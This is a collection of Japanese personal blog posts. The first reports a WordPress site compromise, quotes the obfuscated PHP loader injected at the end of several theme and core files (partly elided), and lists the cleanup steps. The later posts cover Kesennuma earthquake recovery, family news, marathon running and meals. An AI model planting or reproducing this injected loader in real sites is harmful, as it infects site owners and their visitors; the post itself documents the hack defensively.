WordPressに改ざん

知人にもWordpressを勧めて、「結構いいね」なんて言われていたのですが、アララ、ページが改ざんされてしまったそうです。

そのサイトに行くと、ウィルスソフトが「トロイの木馬」に感染したとかいう警告を出すそうな。ひどい人はPCが使い物にならない(といっても、どの程度だったのか詳細は不明ですけど)らしい。

チェックをしてみますと、いくつかのファイルに改ざん後がありました。
ネットで調べると、同様の改ざんが報告されています。
私もこちらに記しておきまする。

■改ざんされたのは次のファイル。
Wordpressのフォルダ/index.php
Wordpressのフォルダ/wp-blog-header.php
Wordpressのフォルダ/wp-content/themes/index.php
Wordpressのフォルダ/wp-content/themes/利用しているテーマ/footer.php
Wordpressのフォルダ/wp-content/themes/利用しているテーマ/header.php
Wordpressのフォルダ/wp-content/themes/利用しているテーマ/index.php

(テストで入れておいたテーマにも改ざんがあったので、そちらはフォルダごと削除)

■改ざん方法
それぞれのphpファイルの最後に次の記載が追加されていた。
これが1行にズラズラ〜っと記載してありました。

<?php @error_reporting(0);
if (!isset($eva1fYlbakBcVSir)) {
$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3T(省略)
bkRTID0xODc5Mjt9";
$eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65";
$eva1tYldakBcVSir = "\x73\164\x72\162\x65\166";
$eva1tYldakBoVS1r = "\x65\143\x(省略)\x67\145\x72\160";
$eva1tYidokBoVSjr = "\x3b\51\x29\135\x31\(省略)
akBcVSir($eva1tYldakBoVS1r);
$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);
$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016),
$eva1fYlbakBcVSir);$eva1tYXdakAcVSjr =
$eva1tYidakBcVSjr[0.031*0.061];
$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016),
$eva1tYidokBoVSjr);
$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],
$eva1tYidokBcVSjr[62.5*0.016],
$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));
$eva1tYldakBcVSir = "";
$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";
$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";
$eva1tYldakBoVS1r = "\x65\143\x72\160";
$eva1tYldakBcVSir = "";
$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
} ?>

■後処理として、
これらのファイルのその記載は削除してもらって、さらに
・ftpサーバのパスワード変更
・Wordpressのパスワード変更
・レンタルサーバーへの報告
・Wordpressを最新バージョンに更新
・pluginを最新バージョンに更新

これらをして頂きました。ふ〜。

気仙沼情報をいくつか

■三陸新報4/15(日)の記事によると、気仙沼図書館ではiPadの貸し出しを開始したそうです。

iPadが電子書籍の媒体として注目されていることから、気仙沼図書館では「使い方を覚え、生涯学習のために役立ててもらいたい」と話しているそうです。

これはおそらくは、3/30付け三陸新報の記事にあった「東京のトレンドマイクロ社がiPadを10台寄贈」のiPadの活用と思います。

トレンドマイクロ社の「スマイル・プロジェクト」にも記事が掲載されています。
このプロジェクトは「1製品をご購入につき、10円を東日本大震災の復興支援に役立てます。」という取り組みで、昨年7月にもパソコン60台を気仙沼市に寄贈しているそうです。

■魚町「亀山精肉店」さんが南町紫市場で営業を始めた記事も出てました。うちの近所で、子供の頃はいつもお使いに行ってましたから、再開は嬉しいです。

■「気仙沼市立学校長会」は「震災の記録を後世に」残すために「被災から前進するために」を発刊。
学校ごとの被災状況、学校再開に向けた取り組み、展望などを掲載しているそうです。1000部を作成し、市内の学校、関係機関に配布するそうです。

■三陸新報4/25(水)の記事によると、気仙沼のがれき処理業務は大成建設JVが候補に選ばれたそうです。ネットで検索すると、河北新報社netにも記事が出てました。今年は一気に復旧・復興が進むといいですね。

おかげさまで母は退院しました

昨日、母が40日ぶりに退院いたしました。
アパートの部屋でころんで骨折したのが3/18。

ころんだ記憶が何もないというので、脳の検査を受けたり、糖尿病の検査なども受けてからの手術。
弟と弟の嫁にお世話になりっぱなしでございます。

骨折直後の電話の声は、母とは思えぬほどの弱々しさで、こちらが驚くほどでした。

それでも手術が終了して歩けるようになると、お友達になった皆様と一緒に病院内を歩くなどして、足腰の強化に努めたようです。

母の年齢の皆様は子供の頃に戦争があって、それから日本じゅうが豊かになっていって、それなのに、ドボンと大震災の中に転げ落ちてしまい精神的にも参ってる方は多いです。母は気丈にしていますが、それでも今回の怪我には相当参っているでしょう。

遠くにいる娘は何もしてあげられずに申し訳ない思いでいっぱいです。

皇居ラン(50km)

6月はサロマウルトラ100kmを走ります。

その前に、今年も皇居50kmを走っておきたい。
皇居50kmを5時間半で走れればサロマ完走出来るという話があります。
いっときましょう。

GW初日の本日、眠い目をこすりながらイザ皇居!

7時10分には「霞ヶ関」駅に到着。
もう、多くのランナーが走っています。

桜田門から入って、時計台の近くのベンチに飲み物や食べ物を入れたバッグを置いて、軽く準備運動をして、スタートです。ダンナも一緒です。

皇居を10周。
気が遠くなりそうです。

最初はゆっくり入りまして、2周目まではダンナと抜きつ抜かれつしながら並走。
そして3周目で抜かれてからは付いて行けず、、、。

前方にダンナの黄色いTシャツを見つつ走ります。
今日は、東京マラソンでもらったTシャツです。これなら目立つだろうと。

新緑に黄色がよく映えます。
「大手門」あたりというか、新築中の「パレスホテル」の辺りの歩道は工事が終わって、きれいに仕上がっていました。
走りやすいし、歩道幅も少し広くなった気がします。

午前中は初心者ランナーが大勢いました。
スピードもゆっくり目で、私が抜いているんだから、本当にゆっくり。
私も数年前はこうだったんだな。

11時過ぎがピークでしょうか。
その後、12時に近づくにつれて、ランナーは少なくなりました。

8周目、竹橋付近で内藤新宿300RCのキタヤマさんが自転車で通りかかり、「オヤマさん!オーイ」と声を掛けられました。

キタヤマさんは、紺のおだTで走ってくださったそうです。
「皇居20km走って、これから泳ぎに行く」って、すごいわ。
エールをかわして、走ります。

この8周目が一番きつかった。
止めたくなりましたよ、ホント。

でも、ダンナの影も見えなくなり、こうしてはいられません。
なんとか完走しなくては!

9周目、そして10周目。
ゴール!!!

記録は5時間31分。
5時間半には間に合わなかったけれど自己ベスト。
ダンナは、なんと5時間25分で走ったそうで、サロマ完走圏内。すごい。いつの間に実力を付けたのでしょう。

手元の時計では次の通り。
5km:33:02
10km:31:51
15km:32:44
20km:31:20
25km:32:09
30km:32:05
35km:32:58
40km:35:46(←キタヤマさんに会いました)
45km:35:29
50km:34:07(←最後だけ給水時間を含みません)
——————-
合計:5:31:37

これは霞ヶ関駅。

ここのトイレを借りて着替えをして電車で帰りました。
足はボロボロで歩くのがやっとでした。

これでGWはゆっくり過ごせそうです。

読書:100歳までボケない101の方法

「100歳までボケない101の方法―脳とこころのアンチエイジング」白澤卓二・著。

子供のいないワタクシといたしましては、やはり「ピンピンころり」が目標でございます。
病気で寝たきりになってしまっては、皆に迷惑をかけるし、そもそも、寝たきりという状況が、経済的にも可能かどうかわかりません。

人生のゴールの直前まで元気に愉快に暮らしたい。
可能であれば、人生の幕引きまで仕事をしていたい。
ということは、ボケてはいられません。

この本には、食事に関することがたくさん出ています。
それも「腹七分」だそうです。

きちんとした食事をとり、適度な運動をする、脳によい刺激を与える。
わかってはいるけれど、実践出来ないのもまた事実。

時々、こういった類いの本を読むことで反省し、そしてまた自分を諫めるのでございます。

人間120歳ぐらいまでは、元気に生きることが出来るようです。
私がいったい何歳まで生きられるのかわからないけれど、元気に100歳を迎えることを目標にしてみてもいいのかな。

関内にて

昔とった杵柄。

年に一度、ある企業にて「AutoCADD研修」の補助(後ろからサポートする)という仕事を担当しています。
かれこれ何年になりましょうか。

講師とはもう20年以上の付き合いです。
私と同い年で、CADに精通しています。
お互いに気心が知れていて、実にやりやすくて、この仕事は仕事抜きに楽しいのです。

今年は、Windows7になったし、AutoCADのバージョンは2012。
私は準備不足ですが、なんとか乗り切りたい。

先週、1セット目が終了し、昨日と本日は2セット目です。
それも無事に済んで、今日は打ち上げ!

関内駅の「ちんとんしゃん」という沖縄料理のお店。
昨年もここで飲みましたっけ。

かんぱ〜い!
弊社のM君とT君も一緒です。
これからは世代交代をしていかないといけないなぁと思いつつ。

海ぶどうって美味しいですよね!

こちらは「炙り〆サバ」

いけめん君が担当してくださいます☆

いけめん君の他に、お嬢さんもカワイイー。
顔が小さくて、お目めパッチリのお嬢さんをからかったりして、そんな事やってるのはオバちゃんになった証拠ですわ。

また「来年も頑張ろうね!」とエールをかわして、どうにか中野区の家にたどり着きました〜。

気仙沼を元気にする会・補足

「気仙沼を元気にする会」復興フォーラム「海と生きる」には、まだまだ書きたいことがたくさんあります。

まず「海と生きる」の言葉、これいいでしょう?

これは、気仙沼の復興のキャッチコピーだそうです。
気仙沼に生きるということは、「海と生きる」ということだという明確なメッセージ。
復興の決意を感じます。

市長さんのプレゼンは、皆さんをひきつけ、聞き入りました。

なぜ、復興が進まないのか?
防潮堤に対する市長の考え、鹿折に打上ったままの大型船をその後どのようにしたらいいのか、残すのか、撤去するのか?それに対する市長の考え、その難しさ。そして、「津波による死者ゼロを目指す」という明確なメッセージ。

これらが、気仙沼在住の市民の皆さんにもちゃんと伝わるといいですね。

市長は、私と同じ魚町の出身です。
その思いたるや、根っこある部分は同じであるように思います。
難しい局面に市長になったのは、市長の運命なのでしょうね。

東京組も応援しています。

イル ヴェッキオ ムリーノ@新中野

今日は雨。

「気仙沼を元気にする会」「復興箱根駅伝」と続いたので、少々、疲れが出ております。

こんな時は美味しいものを食べるにかぎりますよね!
ってことで、最寄り駅で一番美味しいと思っている「イル ヴェッキオ ムリーノ」にて食事をして来ました。

前菜の盛り合わせ

ワタリガニのパスタ

白身魚のなんだか。

そしてデザートまで。
美味しうございます。

美味しいものを食べると元気が出る。
明日も頑張りましょう。

東日本大震災 復興 箱根駅伝

「東日本大震災 復興 箱根駅伝」を行うと、4/10の三陸新報で読みまして、主催者の小野寺さんに電話しました。
私も走らせていただけないでしょうか。

「どうぞ、どうぞ」と快く応じてくださり、ダンナも一緒に参加させて頂くことになりました。

3時に大手町の旧読売本社前に集合です。

エ?3時って、夜中でしょうか?
そうです。4時にスタートすっからね。
ハ・ハイ。

さて、どうやって大手町に3時にたどり着きましょうか。
早めに行って、ネカフェで時間つぶす?
タクシー使っていく?

イエイエ、走っていくことにしました。
調べると9.5km程度。アップジョグにちょうどいいかな?

真夜中の「靖国神社」前。イエーイ。
気分は観光ランです。

ところで、「旧読売本社」って、Google Mapで調べても出ていないのです。
ネット検索して、「ここがスタート地点」という場所に向かいます。
ここでいいのかなー?
バスはいません。

電話で連絡すると「近くにはいるんだげんと、今、場所を探している」とのこと。
やはり、地図にないので、わかりにくいようです。

読売本社は、現在、工事中でした。
その大きな敷地の、どこがスタート地点なんでしょう。

そうこうするうちに、さまよっているバスを発見し、乗せて頂き、一緒に、あっちかな?こっちかな?
オオ、ここだ、ここだ!

スタートテープを地面に張り、小野寺さんが注意事項などを説明してくださいました。
がんばって完走するゾ!

第1走者さん。
タスキには、あの大津波で亡くなった仲間の写真を付けて走ります。

ご葬儀で小野寺さんが「箱根に連れて行く」と誓ったそうです。それが本日のランにつながったとか。

タスキの背中部分には、「ご支援ありがとうございます」の文字。
感謝ランでもあります。

このバスに乗って、並走します。
バスの中ではランの話、大津波の話、今、仮設にいるという方も。

ほとんどの方が、三陸新報、河北新報といった地元の新聞を見て、電話して参加したとか。私もそうです。
神戸の方は読売新聞をご覧になっての参加だそうです。

気仙沼、南三陸、大船渡、仙台、神戸、埼玉、東京、栃木。
さまざまなところから駆けつけて、箱根を走る。すごい企画です。

中継地点では、みんなでこのようにしてお出迎え。

「鶴見中継所」では「箱根駅伝像」の前でパチリ。

本日のイベントが読売新聞(全国版)にも紹介されたそうです。

その記事を読んだという方が、たまたまバス停にいらして、「ああ、あの記事の、そう〜」と応援してくださいました。
ありがとうございます。

ダンナも頑張っています。
4区の、茅ヶ崎の辺り、海がきれいに見えるところ7.6kmほどを走らせて頂きました。
気合い入ってます。

無事にタスキがつながりました。

大満足!

私は、小田原中継所の手前4.4kmを走ります。

最初の予定では、山の2.2kmだったのですが、欠席の方がいらして、急遽、予定が変わりました。
後から思えば、山でなくて良かった。
車で走っていても、あの山は本当にきついです。

私の前の方は、ラン初心者さんで2.2kmを駆け抜けました。
気仙沼の方です。
いま、タスキを待ってます。

なんとか無事にタスキをつなぎ、私の後からは、いよいよ5区。
予定が変更になり、山は、若者が走ってくださることになりました。

仙台の現役高校生、陸上部の姉妹。速い。
大学卒業して、まだ間もない社会人。先日のかすみがうらフルで3位になったという若者。
第1走者もこなした南三陸町、元陸上部の女性。

若いパワー炸裂で、山を駆け抜けました。若者たち、ありがとう。

そうして、最後の最後は、主催者の小野寺さんがゴール目指します。
すると、「走りたい人はみんなで走ろう」と言ってくださいました。

最後の最後は、少しだけ上った後は下りです。
行きましょう!

しかし、、、あいにくの雨が降って来ました。
持参したカッパ着て、みんなでゴー。

芦ノ湖が見えてからも、さらに進むのですね。
5区のランナーって、これをたった一人で走るんですか。
これは大変なコースですわ。

私は、先頭集団から置いていかれて一人旅に。
なんと、ダンナは先頭集団にくらいついてます。

そして、最後の角を曲がってゴール。
ゴールには、応援の方や、たまたま、そこに居合わせた皆さん、そして読売新聞の記者さんらが迎えてくださいました。

雨の中、ありがとうございます!
「箱根(往路)」完走です!

用意してくださった「完走賞」と「タスキのレプリカ」が参加賞です。ありがとうございます。

それから、「箱根小涌園ユネッサン」に移動してお風呂です。
あ〜あ、スッキリした。疲れもとれます。

バスの皆さんは、御殿場に抜けて東名高速で帰るそうなので、私とダンナはここでお別れをしまして、小田原行きのバスに乗りました。
小田原で、2人で祝杯をあげてからの帰宅です。

長い長い一日でした。
とても充実した日になりました。

ありがとうございました。

気仙沼を元気にする会・復興フォーラム「海と生きる」

気仙沼を元気にする会・復興フォーラム「海と生きる」を開催いたしました。

実行委員長を務めています。
実行委員長よりも、スタッフの皆さんがこの会を作り上げてくださいました。
企画から当日の運営まで若い皆様には本当にありがとうございます。

おかげさまで、日本青年館ホテルで行われた「勉強会」には、10時開催という時間帯にも関わらず、200名近い方々がお集りくださいました。

今回は、気仙沼出身者だけではなく、思いを寄せてくださる多くの方が集まって頂きまして、ボランティアで現地に行った学生さんも多くいらっしゃいました。心強いです。ありがたいです。

本日は、気仙沼市長にお越しいただきまして、「気仙沼市の復興計画」について話していただきました。
この企画に快く応じてくださった市長さんには、本当に感謝でいっぱいです。お忙しいところ、ありがとうございます。

こちらは、最初の私の挨拶。
お隣に座っていらっしゃるのは市長さん。

市長さんのプレゼンテーションは本当にすばらしいものでした。
なぜ「かさ上げ」が始まらない?
どうして、「高台移転」が進まない?

それらには、様々な困難なことがありました。
市長さんは、わかりやすい言葉で、PowetPointで図を表示して、より伝わりやすく話してくださいました。

国には、相変わらずの「縦割り」があって進まず、そして「税金は個人のものに使ってはいけない」という大前提が様々なことが進まない理由であることがわかりました。

このような大震災で大きな被害を、広大な領域に渡って受けているにも関わらず、平時の時の決まり事を切り崩せないって、いったいどういう事でしょう。

そんな状態と市は戦っているのです。
地元の皆さんには、歯がゆい事も多いでしょうけれど、市長さんのこの説明が、市民の皆さんにもきちんと伝わるといいですね。

それでも、昨年の9月頃までは、市民の声を十分には聞けなかったと反省もしてらっしゃいました。
そのように「反省」して「前に進む」点などは、これまでの方とは違うのではないでしょうか。
それでも、実際に動く「市の職員」さんが不足してもいるのでしょう。

そんな中にあって「復興庁」が出来たことは大きなことだと話していました。
そういった「縦割り」を切り崩していって欲しいです。

市長さんが、東京で説明をしてくださったのは、「最後にお願いがあります」と、ここを伝えたいのだとわかります。

気仙沼の外からの支援、特にソフト面での協力、そういったお願いをしていました。

気仙沼の内外から復興はしていくものだと改めて思った次第です。

それにしても、市長さんになってすぐに震災が起きて、「気仙沼の復興のために市長さんになった」ような運命を感じます。人にはそれぞれ持って生まれた運命があるのでしょうか。

東京組も出来ることを探して、少しずつ動いています。

企業の方や、ボランティアの方の「活動報告」をして頂きました。

今日の司会を務めてくださったのは、この「勉強会」の発案者である斎藤さんです。
三陸新報さんの「故郷永久(ふるさととわ)」の販売まで、様々なアイディアありがとうございます。

場所は変えての「懇親会」にも大勢の方が残ってくださいました。ありがとうございます。
この会の運営の母体でもあります「気仙沼サポートビューロー」代表理事の畠山さんの挨拶は感動です。

特に市長さんの同級生の皆さんが大勢いらしていて、同級生の中での市長さんの笑顔はまた別ものですね。

私は被災地が忘れ去られないように、伝え続けたいと思います。
本日は本当にありがとうございました。